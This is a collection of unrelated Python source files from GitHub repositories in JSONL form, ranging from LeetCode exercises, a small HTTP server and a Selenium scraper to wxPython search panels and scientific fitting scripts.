config.get('key'), config.get('algorithm'))\n except Exception as e:\n raise str(e)\n finally:\n return payload\n\n","repo_name":"kalicodextu/exercises","sub_path":"test_pro/test_suits/jwt_base.py","file_name":"jwt_base.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4087806795","text":"#!/usr/bin/env python3\nimport random\nimport argparse\n\ndef pair_names(names_list):\n if not names_list:\n return \"The list is empty. No pairs can be made.\"\n\n random.shuffle(names_list)\n\n paired_names = []\n\n for i in range(0, len(names_list)-1, 2):\n paired_names.append((names_list[i], names_list[i+1]))\n\n if len(names_list) % 2 == 1:\n single_person = names_list[-1]\n return paired_names, f\"{single_person} does not have a pair.\"\n\n return paired_names, None\n\n\n\ndef main(input_file, output_file):\n try:\n with open(input_file, 'r') as file:\n list_of_names = [line.strip() for line in file]\n except Exception as e:\n print(f\"Error reading the input file: {e}\")\n return\n\n if not list_of_names:\n print(\"The list is empty. No pairs can be made.\")\n return\n\n pairs, single_info = pair_names(list_of_names)\n\n try:\n with open(output_file, 'w') as file:\n for i, pair in enumerate(pairs, 1):\n file.write(f\"Pair {i}: {pair[0]} -> {pair[1]}\\n\")\n if single_info:\n print(\"There is a person without a pair.\")\n file.write(single_info + '\\n')\n except Exception as e:\n print(f\"Error writing to the output file: {e}\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Pairing names from input file and writing the pairs to output file.\")\n\n parser.add_argument('input_file', type=str, help='Path to the input file containing names')\n parser.add_argument('output_file', type=str, help='Path to the output file for saving pairs')\n\n args = parser.parse_args()\n\n main(args.input_file, args.output_file)","repo_name":"iDommel/scripts","sub_path":"make_pairs/make_pairs.py","file_name":"make_pairs.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7621008899","text":"class Game:\n\n def __init__(self, path):\n f = [x.replace('\\n','') for x in open(path).readlines()]\n if(len(f) == 0):\n raise \"invalid game file\"\n \n\n self.num_actions_col = None\n self.max_reward = None\n self.game_matrix = []\n for line in f:\n values = map(int,line.split(' '))\n #validating game matrix \n if self.num_actions_col == None:\n self.num_actions_col = len(values)\n elif self.num_actions_col != len(values):\n raise \"number of plays for column player does not match\"\n self.max_reward = max(self.max_reward, max(values))\n self.game_matrix.append(values)\n self.num_actions_row = len(f)\n\n def reward(self,action_row, action_col):\n return self.game_matrix[action_row][action_col]\n \n def ratio_of_maximum(self,reward):\n return float(reward)/self.max_reward\n","repo_name":"thiagobell/RLCoordinationGames","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74359575303","text":"from http.server import HTTPServer, SimpleHTTPRequestHandler\r\nfrom random import random, seed\r\nfrom urllib.parse import urlparse\r\n\r\nseed(1)\r\n\r\nclass MyHttpRequestHandler(SimpleHTTPRequestHandler):\r\n handlers = {\r\n '/temp1': 'do_temp1'\r\n }\r\n\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, directory='./static', **kwargs)\r\n\r\n def do_GET(self):\r\n path = urlparse(self.path).path\r\n handler = self.__class__.handlers.get(path, None)\r\n if handler is not None:\r\n return getattr(self, handler)()\r\n\r\n return super().do_GET()\r\n\r\n def do_temp1(self):\r\n self.send_response(200)\r\n\r\n self.send_header('Content-type', 'text/html')\r\n self.end_headers()\r\n\r\n randomTemp = round(random() * 10 + 15, 2)\r\n self.wfile.write(bytes(str(randomTemp), 'utf8'))\r\n\r\n return\r\n\r\nhttpd = HTTPServer(('', 8000), MyHttpRequestHandler)\r\n\r\nhttpd.serve_forever()","repo_name":"gimre/pysense","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41356745527","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nGiven a binary array, find the maximum number of consecutive 1s in this array.\n\nExample 1:\nInput: [1,1,0,1,1,1]\nOutput: 3\nExplanation: The first two digits or the last three digits are consecutive 1s.\n The maximum number of consecutive 1s is 3.\nNote:\n\nThe input array will only contain 0 and 1.\nThe length of input array is a positive integer and will not exceed 10,000\n\"\"\"\n\n\nclass Solution:\n def findMaxConsecutiveOnes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n 遍历,累加,判断大小\n\n >>> test1 = [1,1,0,1,1,1]\n >>> s = Solution()\n >>> s.findMaxConsecutiveOnes(test1)\n 3\n \"\"\"\n sum_ = 0\n l = len(nums)\n max_ = 0\n for i in range(l):\n if nums[i] == 1:\n sum_ += 1\n else:\n sum_ = 0\n if sum_ > max_:\n max_ = sum_\n return max_\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod(verbose=True)\n","repo_name":"misslibra/algorithms","sub_path":"python/max-consecutive-ones.py","file_name":"max-consecutive-ones.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"11058737529","text":"import sys\nn = int(sys.stdin.readline())\nstack = []\n\n\ndef push(a):\n stack.append(a)\n\n\ndef pop():\n if len(stack) == 0:\n return -1\n return stack.pop()\n\n\ndef size():\n return len(stack)\n\n\ndef empty():\n if len(stack) == 0:\n return 1\n return 0\n\n\ndef top():\n if len(stack) == 0:\n return -1\n return stack[-1]\n\n\nfor _ in range(n):\n il = sys.stdin.readline().split()\n if il[0] == \"push\":\n push(il[1])\n elif il[0] == \"pop\":\n print(pop())\n elif il[0] == \"size\":\n print(size())\n elif il[0] == \"empty\":\n print(empty())\n else:\n print(top())\n","repo_name":"jjhh0210/PythonStudy","sub_path":"practice_src/baekjoon/10828_stack.py","file_name":"10828_stack.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25712864745","text":"def reverseVowels(s):\n total_vowels = 'AEIOUaeiou' # 元音字母\n list_s = list(s)\n start = 0 # 列表开头\n end = len(s)-1 # 列表末尾\n\n while start < end: \n if list_s[start] not in total_vowels: # 从列表首到尾,判断是否是元音字母,不是的index加1\n start += 1\n elif list_s[end] not in total_vowels: # 从列表尾到首,判断是否是元音字母,不是的index减一\n end -= 1 \n else: # 当两边都是元音字母时交换 \n list_s[start], list_s[end] = list_s[end], list_s[start]\n start += 1\n end -= 1\n return ''.join(list_s)\n","repo_name":"sunshine-sjd/LeetCode","sub_path":"reverse-vowels-of-a-string.py","file_name":"reverse-vowels-of-a-string.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12661904722","text":"'''\r\nAuthor: Thomas Grant\r\nCopyright: © 2023 Thomas Grant\r\nLicense: MIT License\r\n'''\r\n# Libraries\r\nimport logging\r\n\r\n# Setup a local logging system for troubleshooting\r\ndef setup_logging(app):\r\n file_handler = logging.FileHandler('../app.log')\r\n app.logger.addHandler(file_handler)\r\n app.logger.setLevel(logging.INFO)","repo_name":"thomas-um-grant/audit-log-service","sub_path":"api/src/helpers/loggings.py","file_name":"loggings.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9645145041","text":"import numpy as np\nfrom spt3g import core, calibration, dfmux\nfrom scipy.optimize import curve_fit\nimport argparse\nimport pickle\n\nparser = argparse.ArgumentParser()\nparser.add_argument('asdintrans',\n help='Name of file containing ASDs to fit for in-transition '\n 'data.')\nparser.add_argument('asdhorizon',\n help='Name of file containing ASDs to fit for horizon data.')\nparser.add_argument('outfile',\n help='Name of output file to save.')\nargs = parser.parse_args()\n\nnormal_data = list(core.G3File(args.asdintrans))\nhorizon_data = list(core.G3File(args.asdhorizon))\n\nf_min = 0.01\nf_max = 60\n\n# noise model\ndef noise_model_full(x, readout, A, alpha, photon, phonon, tau):\n return np.sqrt(readout**2 + (A * (x)**(-1*alpha)) + (photon**2 + phonon**2) / (1 + 2*np.pi*(x*tau)))\ndef full_readout_model(x, readout, A, alpha):\n return np.sqrt(readout**2 + (A * (x)**(-1*alpha)))\n\n# fits to horizon data\nfreq = np.array(horizon_data[1][\"ASD\"]['frequency']) / core.G3Units.Hz\nfit_params_horizon = {}\n\njbolo = 0\nfor bolo in horizon_data[1][\"ASD\"].keys():\n asd = np.array(horizon_data[1][\"ASD\"][bolo])\n if np.all(np.isfinite(asd)):\n try:\n par_normal, cov = curve_fit(full_readout_model,\n freq[(freq>f_min) & (freqf_min) & (freqf_min) & (freqf_min) & (freq modelacc > 0.3:\n if time < 10:\n myScore = int(modelacc*100) + 5\n if 10 < time < 20:\n myScore = int(modelacc*100) + 2\n else:\n myScore = int(modelacc*100)\n else:\n myScore = int(modelacc*100)\n # myScore = int(time / (1-modelacc)) #inverse efficiency score\n if answer not in CATEGORIES:\n myScore = 0\n response = {\n 'modelAnswer': CATEGORIES[prediction[0].index(max(prediction[0]))],\n 'myScore': myScore,\n }\n return jsonify(response)\n\n","repo_name":"thecipher18/flaskapp","sub_path":"predict_app.py","file_name":"predict_app.py","file_ext":"py","file_size_in_byte":5881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1810625036","text":"import unittest\nimport os\nfrom rename_files import rename_txt\n\n\nclass RenameTest(unittest.TestCase):\n def setUp(self):\n # create temporal directory with files to rename\n self.path = os.path.join(os.getcwd(), 'temp_dir')\n os.mkdir(self.path)\n self.file1 = os.path.join(self.path, 'file1.txt')\n self.file2 = os.path.join(self.path, 'file2.txt')\n with open(self.file1, 'w') as f:\n f.write('test')\n with open(self.file2, 'w') as f:\n f.write('test')\n\n def test(self):\n # test the files exist\n self.assertTrue(os.path.exists(self.file1))\n self.assertTrue(os.path.exists(self.file2))\n rename_txt(self.path, 'new_')\n # check they have been rename\n self.assertTrue(not os.path.exists(self.file1))\n self.assertTrue(not os.path.exists(self.file2))\n # check they have been rename correctly\n self.new_file1 = os.path.join(self.path, 'new_file1.txt')\n self.assertTrue(self.new_file1)\n self.new_file2 = os.path.join(self.path, 'new_file2.txt')\n self.assertTrue(self.new_file2)\n # remove temporary files and dirs\n os.remove(self.new_file1)\n os.remove(self.new_file2)\n os.rmdir(self.path)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"MaximoRdz/AUTOMATIZATION","sub_path":".ipynb_checkpoints/test_rename_files-checkpoint.py","file_name":"test_rename_files-checkpoint.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"15126819062","text":"from models import BaseModel\n\nclass RegistryModel(BaseModel):\n table = \"registrys\"\n db = \"console\"\n \n fields={\n \"registry_id\":True,\n \"container_id\":True,\n \"user_name\":True,\n \"user_id\":True,\n \"inspect_container\":True,\n \"run_host\":True,\n \"status\":True,\n \"logs\":True,\n \"update_time\":True,\n 'create_time':True\n }","repo_name":"liuhong1happy/DockerConsoleApp","sub_path":"models/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"81"} +{"seq_id":"6587107317","text":"from selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom bs4 import BeautifulSoup\nimport requests\nimport urllib2\nimport time\nimport csv\nimport sys\n\ndef elementExistsByTag(tag, parent):\n\ttry:\n\t\tparent.find_element_by_tag_name(tag)\n\texcept NoSuchElementException:\n\t\treturn False\n\treturn True\n\ndef showMoreButton(className, parent):\n\ttry:\n\t\tparent.find_element_by_css_selector(className)\n\texcept NoSuchElementException:\n\t\treturn False\n\treturn True\n\ndef scrollToBottom(driver):\n\tlastHeight = driver.execute_script('return document.body.scrollHeight')\n\tk = 0\n\twhile True:\n\t\tdriver.execute_script('window.scrollTo(0, document.body.scrollHeight);')\n\t\ttime.sleep(15)\n\t\tk = k+1\n\t\t\n\t\tnewHeight = driver.execute_script('return document.body.scrollHeight')\n\t\tif newHeight == lastHeight:\n\t\t\tif showMoreButton('.btn.btn-primary.btn-lg.show-more', driver):\n\t\t\t\tif(k>=30):\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tdriver.find_element_by_css_selector('.btn.btn-primary.btn-lg.show-more').click()\n\t\t\telse:\t\n\t\t\t\tbreak\n\t\telse:\n\t\t\tlastHeight = newHeight\n\ndef scrapePage(driver, source):\n\ttime.sleep(5)\n\n\tprojects = driver.find_elements_by_xpath('//div[@data-source=\"discover\"]')\n\n\twith open('experimentdotcom.csv','a') as dump:\n\t\twriter = csv.writer(dump)\n\t\twriter.writerow(['Source', 'Project Link', 'First Name', 'Last Name', 'Organisation'])\n\n\t\tfor project in projects:\n\t\t\tlink = project.find_element_by_class_name('project-card-content').find_element_by_tag_name('h3').find_element_by_tag_name('a').get_attribute('href')\n\n\t\t\tfullName = project.find_element_by_class_name('project-card-footer').find_element_by_class_name('researcher-info').find_element_by_class_name('researcher-description').find_element_by_tag_name('a').text.encode('ascii','ignore').decode('ascii')\n\t\t\tif(len(fullName.split( ))>1):\n\t\t\t\tfirstName = fullName.split( )[0]\n\t\t\t\tlastName = fullName.split( )[1]\n\t\t\telse:\n\t\t\t\tfirstName = fullName.split( )[0]\n\t\t\t\tlastName = \" \"\n\n\t\t\tinstitution = project.find_element_by_class_name('project-card-footer').find_element_by_class_name('researcher-info').find_element_by_class_name('researcher-institution').find_element_by_class_name('institution')\n\n\t\t\tif elementExistsByTag('a', institution):\n\t\t\t\tplace = institution.find_element_by_tag_name('a').text.encode('ascii','ignore').decode('ascii')\n\t\t\telse:\n\t\t\t\tplace = institution.text.encode('ascii','ignore').decode('ascii')\n\n\n\t\t\twriter.writerow([source, link, firstName, lastName, place])\n\n\n\n\npath = 'path/to/chromedriver.exe'\nurl = 'https://experiment.com/discover'\ndriver = webdriver.Chrome(path)\ndriver.get(url)\n\ndriver.maximize_window()\nscrollToBottom(driver)\nscrapePage(driver, url)\ndriver.quit()\n\n","repo_name":"kelvingakuo/Crowd-Funding-Bots","sub_path":"ExperimentDotComScraper/experimentDotComScraper.py","file_name":"experimentDotComScraper.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40085959847","text":"import re, wx\nimport metrics\n\nclass FindPanel(wx.Panel):\n \"\"\"\n This allows the user to enter a search term and select various\n criteria (i.e. \"match case\", etc.) There are two callbacks:\n\n onFind (regexp, flags)\n Regexp corresponds to the user's search, and flags should be used\n when performing that search.\n\n onClose()\n When the user clicks the Close button.\n \"\"\"\n\n def __init__(self, parent, onFind = None, onClose = None):\n self.findCallback = onFind\n self.closeCallback = onClose\n\n wx.Panel.__init__(self, parent)\n sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(sizer)\n\n # find text and label\n\n findSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n findSizer.Add(wx.StaticText(self, label = 'Find'), flag = wx.BOTTOM | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, \\\n border = metrics.size('relatedControls'), proportion = 0)\n self.findField = wx.TextCtrl(self)\n findSizer.Add(self.findField, proportion = 1, flag = wx.BOTTOM | wx.EXPAND, \\\n border = metrics.size('relatedControls'))\n sizer.Add(findSizer, flag = wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border = metrics.size('windowBorder'))\n\n # option checkboxes\n\n optionSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n self.caseCheckbox = wx.CheckBox(self, label = 'Match Case')\n self.wholeWordCheckbox = wx.CheckBox(self, label = 'Whole Word')\n self.regexpCheckbox = wx.CheckBox(self, label = 'Regular Expression')\n\n optionSizer.Add(self.caseCheckbox, flag = wx.BOTTOM | wx.RIGHT, border = metrics.size('relatedControls'))\n optionSizer.Add(self.wholeWordCheckbox, flag = wx.BOTTOM | wx.LEFT | wx.RIGHT, \\\n border = metrics.size('relatedControls'))\n optionSizer.Add(self.regexpCheckbox, flag = wx.BOTTOM | wx.LEFT, \\\n border = metrics.size('relatedControls'))\n sizer.Add(optionSizer, flag = wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, \\\n border = metrics.size('windowBorder'))\n\n # find and close buttons\n\n buttonSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n self.closeButton = wx.Button(self, label = 'Close')\n self.closeButton.Bind(wx.EVT_BUTTON, self.onClose)\n\n self.findButton = wx.Button(self, label = 'Find Next')\n self.findButton.Bind(wx.EVT_BUTTON, self.onFind)\n\n buttonSizer.Add(self.closeButton, flag = wx.TOP | wx.RIGHT, border = metrics.size('buttonSpace'))\n buttonSizer.Add(self.findButton, flag = wx.TOP, border = metrics.size('buttonSpace'))\n sizer.Add(buttonSizer, flag = wx.ALIGN_RIGHT | wx.BOTTOM | wx.LEFT | wx.RIGHT, \\\n border = metrics.size('windowBorder'))\n sizer.Fit(self)\n\n def focus(self):\n \"\"\"\n Focuses the proper text input and sets our default button.\n \"\"\"\n self.findField.SetFocus()\n self.findButton.SetDefault()\n\n def updateUI(self, event):\n pass\n\n def onFind(self, event):\n \"\"\"\n Assembles a regexp based on field values and passes it on to our callback.\n \"\"\"\n if self.findCallback:\n regexp = self.findField.GetValue()\n flags = None\n\n if not self.caseCheckbox.GetValue():\n flags = re.IGNORECASE\n\n if not self.regexpCheckbox.GetValue():\n regexp = re.escape(regexp)\n\n if self.wholeWordCheckbox.GetValue():\n regexp = r'\\b' + regexp + r'\\b'\n\n self.findCallback(regexp, flags)\n\n def onClose(self, event):\n \"\"\"\n Passes on a close message to our callback.\n \"\"\"\n if self.closeCallback: self.closeCallback()\n\nclass ReplacePanel(wx.Panel):\n \"\"\"\n This allows the user to enter a search and replace term and select\n various criteria (i.e. \"match case\", etc.) There are two callbacks:\n\n onFind (regexp, flags)\n Regexp corresponds to the user's search, and flags should be used\n when performing that search.\n\n onReplace (regexp, flags, replaceTerm)\n Like find, only with a replaceTerm.\n\n onReplaceAll (regexp, flags, replaceTerm)\n Like replace, only the user is signalling that they want to replace\n all instances at once.\n\n onClose()\n When the user clicks the Close button.\n\n You may also pass in a parameter to set whether users can perform\n incremental searches, or if they may only replace all.\n \"\"\"\n\n def __init__(self, parent, allowIncremental = True, \\\n onFind = None, onReplace = None, onReplaceAll = None, onClose = None):\n self.allowIncremental = allowIncremental\n self.findCallback = onFind\n self.replaceCallback = onReplace\n self.replaceAllCallback = onReplaceAll\n self.closeCallback = onClose\n\n wx.Panel.__init__(self, parent)\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(sizer)\n\n fieldSizer = wx.FlexGridSizer(2, 2)\n fieldSizer.AddGrowableCol(1, 1)\n\n # find text and label\n\n fieldSizer.Add(wx.StaticText(self, label = 'Find'), \\\n flag = wx.BOTTOM | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, \\\n border = metrics.size('relatedControls'), proportion = 0)\n self.findField = wx.TextCtrl(self)\n fieldSizer.Add(self.findField, proportion = 1, flag = wx.BOTTOM | wx.EXPAND, \\\n border = metrics.size('relatedControls'))\n\n # replace text and label\n\n fieldSizer.Add(wx.StaticText(self, label = 'Replace With'), \\\n flag = wx.BOTTOM | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, \\\n border = metrics.size('relatedControls'), proportion = 0)\n self.replaceField = wx.TextCtrl(self)\n fieldSizer.Add(self.replaceField, proportion = 1, flag = wx.BOTTOM | wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, \\\n border = metrics.size('relatedControls'))\n\n sizer.Add(fieldSizer, flag = wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border = metrics.size('windowBorder'))\n\n # option checkboxes\n\n optionSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n self.caseCheckbox = wx.CheckBox(self, label = 'Match Case')\n self.wholeWordCheckbox = wx.CheckBox(self, label = 'Whole Word')\n self.regexpCheckbox = wx.CheckBox(self, label = 'Regular Expression')\n\n optionSizer.Add(self.caseCheckbox, flag = wx.BOTTOM | wx.TOP | wx.RIGHT, \\\n border = metrics.size('relatedControls'))\n optionSizer.Add(self.wholeWordCheckbox, flag = wx.BOTTOM | wx.TOP | wx.LEFT | wx.RIGHT, \\\n border = metrics.size('relatedControls'))\n optionSizer.Add(self.regexpCheckbox, flag = wx.BOTTOM | wx.TOP | wx.LEFT, \\\n border = metrics.size('relatedControls'))\n sizer.Add(optionSizer, flag = wx.LEFT | wx.RIGHT, border = metrics.size('windowBorder'))\n\n # find and close buttons\n\n buttonSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n self.closeButton = wx.Button(self, label = 'Close')\n self.closeButton.Bind(wx.EVT_BUTTON, self.onClose)\n buttonSizer.Add(self.closeButton, flag = wx.TOP | wx.RIGHT, border = metrics.size('buttonSpace'))\n\n if allowIncremental:\n buttonSizer.Add(wx.Panel(self))\n self.findButton = wx.Button(self, label = 'Find Next')\n self.findButton.Bind(wx.EVT_BUTTON, self.onFind)\n buttonSizer.Add(self.findButton, flag = wx.TOP | wx.LEFT | wx.RIGHT, \\\n border = metrics.size('buttonSpace'))\n self.replaceButton = wx.Button(self, label = 'Replace')\n self.replaceButton.Bind(wx.EVT_BUTTON, self.onReplace)\n buttonSizer.Add(self.replaceButton, flag = wx.TOP | wx.RIGHT, border = metrics.size('buttonSpace'))\n\n self.replaceAllButton = wx.Button(self, label = 'Replace All')\n self.replaceAllButton.Bind(wx.EVT_BUTTON, self.onReplaceAll)\n buttonSizer.Add(self.replaceAllButton, flag = wx.TOP, border = metrics.size('buttonSpace'))\n\n sizer.Add(buttonSizer, flag = wx.ALIGN_RIGHT | wx.LEFT | wx.RIGHT | wx.BOTTOM, \\\n border = metrics.size('windowBorder'))\n sizer.Fit(self)\n\n def focus(self):\n \"\"\"\n Focuses the proper text input and sets our default button.\n \"\"\"\n self.findField.SetFocus()\n if self.allowIncremental:\n self.replaceButton.SetDefault()\n else:\n self.replaceAllButton.SetDefault()\n\n def onFind(self, event):\n \"\"\"\n Passes a find message to our callback.\n \"\"\"\n if self.findCallback:\n regexps = self.assembleRegexps()\n self.findCallback(regexps['find'], regexps['flags'])\n\n def onReplace(self, event):\n \"\"\"\n Passes a replace message to our callback.\n \"\"\"\n if self.replaceCallback:\n regexps = self.assembleRegexps()\n self.replaceCallback(regexps['find'], regexps['flags'], regexps['replace'])\n\n def onReplaceAll(self, event):\n \"\"\"\n Passes a replace all message to our callback.\n \"\"\"\n if self.replaceAllCallback:\n regexps = self.assembleRegexps()\n self.replaceAllCallback(regexps['find'], regexps['flags'], regexps['replace'])\n\n def onClose(self, event):\n \"\"\"\n Passes on a close message to our callback.\n \"\"\"\n if self.closeCallback: self.closeCallback()\n\n def assembleRegexps(self):\n \"\"\"\n Builds up the regexp the user is searching for. Returns a dictionary with\n keys 'find', 'replace', and 'flags'.\n \"\"\"\n result = {}\n result['find'] = self.findField.GetValue()\n result['replace'] = self.replaceField.GetValue()\n result['flags'] = None\n\n if not self.regexpCheckbox.GetValue():\n result['find'] = re.escape(result['find'])\n\n if not self.caseCheckbox.GetValue():\n result['flags'] = re.IGNORECASE\n\n if self.wholeWordCheckbox.GetValue():\n result['find'] = r'\\b' + result['find'] + r'\\b'\n\n return result\n","repo_name":"tweecode/twine","sub_path":"searchpanels.py","file_name":"searchpanels.py","file_ext":"py","file_size_in_byte":10170,"program_lang":"python","lang":"en","doc_type":"code","stars":648,"dataset":"github-code","pt":"81"} +{"seq_id":"28116070565","text":"import csv,sqlite3\n\nmydb = sqlite3.connect('pokedex.db')\ncurs = mydb.cursor()\n\nwith open('pokemon.csv','rt') as poke:\n\treaddata = csv.DictReader(poke)\n\tpokemon = [(i['id'], i['identifier'], i['species_id'], i['height'], i['weight'], i['base_experience'], i['order'],i['is_default'])\n\tfor i in readdata]\ncurs.executemany(\"INSERT INTO POKEMON (id,identifier,species_id,height,weight,base_experience,'order',is_default) VALUES(?,?,?,?,?,?,?,?);\" ,pokemon)\n\nwith open('abilities.csv','rt') as abi:\n\treaddata = csv.DictReader(abi)\n\tabilities = [(i['id'], i['identifier'], i['generation_id'],i['is_main_series'])\n\tfor i in readdata]\ncurs.executemany(\"INSERT INTO ABILITIES (id,identifier,generation_id,is_main_series) VALUES(?,?,?,?);\" ,abilities)\n\nwith open('pokemon_abilities.csv','rt') as pokabi:\n\treaddata = csv.DictReader(pokabi)\n\tpokeabil = [(i['pokemon_id'], i['ability_id'], i['is_hidden'], i['slot']) for i in readdata]\ncurs.executemany(\"INSERT INTO POKEMON_ABILITIES (pokemon_id,ability_id,is_hidden,slot) VALUES(?,?,?,?);\" ,pokeabil)\nmydb.commit()\nmydb.close()\n","repo_name":"rishyanthkondra/CS251-IITB-Software-and-Systems-Lab","sub_path":"inlab7- sqlite3/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9940881034","text":"class Solution:\r\n def isPalindrome(self, s: str) -> bool:\r\n s = s.lower()\r\n print(s)\r\n b = \"\"\r\n for i in s:\r\n if i.isalpha():\r\n b+= i \r\n print(b)\r\n\r\n\r\n if b == b[::-1]:\r\n return \"true\"\r\n else:\r\n return \"false\"\r\n \r\nsol = Solution()\r\nprint(sol.isPalindrome(\"race a car\"))","repo_name":"sohaildua/Datastructuresrepo","sub_path":"strinh/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36070147535","text":"#!/usr/bin/env python\n\nfrom Bio.Seq import Seq\nfrom Bio.Alphabet import generic_dna\nfrom Bio import SeqIO\nfrom Bio import SearchIO\nfrom Bio.SeqRecord import SeqRecord\n\nimport os\nfrom os import listdir\nfrom os.path import join, isfile\nimport sys\nimport argparse\n\nimport edlib\nimport re\n\ndef edist(lst):\n if len(str(lst[0])) == 0:\n return -1, \"\"\n if len(str(lst[1])) == 0:\n return -1, \"\"\n result = edlib.align(str(lst[0]), str(lst[1]), mode=\"NW\", task=\"path\")\n return result[\"editDistance\"], result[\"cigar\"]\n\ndef aai(ar):\n p1, p2 = str(ar[0]), str(ar[1])\n if p1.endswith(\"*\"):\n p1 = p1[:-1]\n if p2.endswith(\"*\"):\n p2 = p2[:-1]\n ed, cigar = edist([str(p1), str(p2)])\n if ed == -1:\n return 0\n matches = re.findall(r'\\d+=', cigar)\n aai = 0.0\n for m in matches:\n aai += int(m[:-1])\n aai /= max(len(p1), len(p2))\n return aai*100\n\ndef load_fasta(filename, tp = \"list\"):\n if tp == \"map\":\n records = SeqIO.to_dict(SeqIO.parse(filename, \"fasta\"))\n for r in records:\n records[r] = records[r].upper() \n else:\n records = list(SeqIO.parse(filename, \"fasta\"))\n for i in range(len(records)):\n records[i] = records[i].upper()\n return records\n\ndef make_record(seq, name, sid, d=\"\"):\n return SeqRecord(seq, id=sid, name=name, description = d)\n\ndef add_rc_monomers(monomers):\n res = []\n for m in monomers:\n res.append(m)\n res.append(make_record(m.seq.reverse_complement(), m.name + \"'\", m.id + \"'\"))\n return res\n\ndef convert_read(decomposition, read, monomers):\n res = []\n for d in decomposition:\n monomer, start, end = d[\"m\"], d[\"start\"], d[\"end\"]\n scores = {}\n for m in monomers:\n score = aai([read.seq[start:end + 1], m.seq])\n scores[m.name] = score\n \n if monomer == None:\n for s in scores:\n if monomer == None or scores[s] > scores[monomer]:\n monomer = s\n secondbest, secondbest_score = None, -1 \n for m in scores:\n if m != monomer:\n if not secondbest or secondbest_score < scores[m]:\n secondbest, secondbest_score = m, scores[m]\n res.append({\"m\": monomer, \"start\": str(d[\"start\"]), \"end\": str(d[\"end\"]), \"score\": scores[monomer], \\\n \"second_best\": str(secondbest), \"second_best_score\": secondbest_score, \"alt\": scores, \"q\": \"+\"})\n\n window = 2\n for i in range(len(res)):\n sm, cnt = 0, 0\n for j in range(i - window, i + window + 1):\n if j >= 0 and j < len(res):\n sm += res[j][\"score\"]\n cnt += 1\n if sm/cnt < 80:\n res[i][\"q\"] = \"?\"\n\n return res\n\ndef print_read(fout, fout_alt, dec, read, monomers, identity_th):\n dec = convert_read(dec, read, monomers)\n for d in dec:\n if d[\"score\"] >= identity_th:\n fout.write(\"\\t\".join([read.name, d[\"m\"], d[\"start\"], d[\"end\"], \"{:.2f}\".format(d[\"score\"]), \\\n d[\"second_best\"], \"{:.2f}\".format(d[\"second_best_score\"]), d[\"q\"]]) + \"\\n\")\n for a in d[\"alt\"]:\n star = \"-\"\n if a == d[\"m\"]:\n star = \"*\"\n fout_alt.write(\"\\t\".join([read.name, a, d[\"start\"], d[\"end\"], \"{:.2f}\".format(d[\"alt\"][a]), star]) + \"\\n\")\n\ndef convert_tsv(filename, reads, monomers, outfile, identity_th):\n with open(outfile[:-len(\".tsv\")] + \"_alt.tsv\", \"w\") as fout_alt:\n with open(outfile, \"w\") as fout:\n with open(filename, \"r\") as fin:\n cur_dec = []\n prev_read = None\n for ln in fin.readlines():\n read, monomer, start, end = ln.split(\"\\t\")[:4]\n if read != prev_read and prev_read != None:\n print_read(fout, fout_alt, cur_dec, reads[prev_read], monomers, identity_th)\n cur_dec = []\n prev_read = read\n start, end = int(start), int(end)\n cur_dec.append({\"m\": monomer, \"start\": start, \"end\": end})\n if len(cur_dec) > 0:\n print_read(fout, fout_alt, cur_dec, reads[prev_read], 